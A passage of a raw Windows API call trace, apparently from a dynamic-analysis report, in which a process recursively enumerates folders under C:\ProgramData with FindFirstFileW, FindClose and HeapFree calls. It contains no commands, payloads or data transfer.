lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c220 [0112.722] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.723] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c220 [0112.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.725] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.725] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.725] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.726] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c220 [0112.727] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.727] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.727] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0119.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0119.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0119.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0119.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2a0 [0119.965] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0119.965] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0119.965] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0119.965] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0119.966] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0119.966] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0119.967] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0119.967] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0119.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2a0 [0121.175] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0121.175] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0121.175] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.175] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.175] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.175] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.176] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.176] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.179] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.179] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.179] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.179] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.180] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.180] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.180] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.181] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.183] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.183] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.183] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.183] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.184] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.184] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.185] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.185] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.188] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.189] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.189] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.189] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.190] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.190] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.193] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.193] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.193] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.193] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.194] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.194] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.198] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.198] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.199] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.199] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.200] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.200] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.201] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.201] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.201] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.201] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.202] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.202] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c1e0 [0121.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c160 [0121.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0121.204] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.204] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.204] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.204] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.205] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.205] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0121.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0121.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c2a0 [0121.315] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0121.315] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0121.315] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.315] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.315] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.315] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0121.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0121.399] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c1e0 [0121.429] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.429] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0121.430] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.430] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.430] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.430] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0121.431] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0122.334] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.334] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0122.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c320 [0122.438] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0122.438] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40400a0 | out: hHeap=0x1db0000) returned 1 [0122.438] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0122.438] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4030098 | out: hHeap=0x1db0000) returned 1 [0122.438] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0122.438] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0122.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c320 [0122.441] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0122.441] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40400a0 | out: hHeap=0x1db0000) returned 1 [0122.441] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0122.441] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4030098 | out: hHeap=0x1db0000) returned 1 [0122.441] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0122.441] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.442] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0122.442] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.442] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0122.442] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.443] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0122.443] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0122.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c320 [0122.443] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0122.444] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40400a0 | out: hHeap=0x1db0000) returned 1 [0122.444] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0122.444] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4030098 | out: hHeap=0x1db0000) returned 1 [0122.444] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0122.444] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.445] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0122.445] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0122.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0xffffffff [0122.445] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0122.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0122.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0122.446] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0122.446] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4030098 | out: hHeap=0x1db0000) returned 1 [0122.446] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0122.446] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0122.447] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0122.447] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0122.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0xffffffff [0122.447] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0122.447] FindClose (in: hFindFile=0x29c020 | out: hFindFile=0x29c020) returned 1 [0122.447] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0122.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0xffffffff [0122.447] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0122.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0xffffffff [0122.447] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) 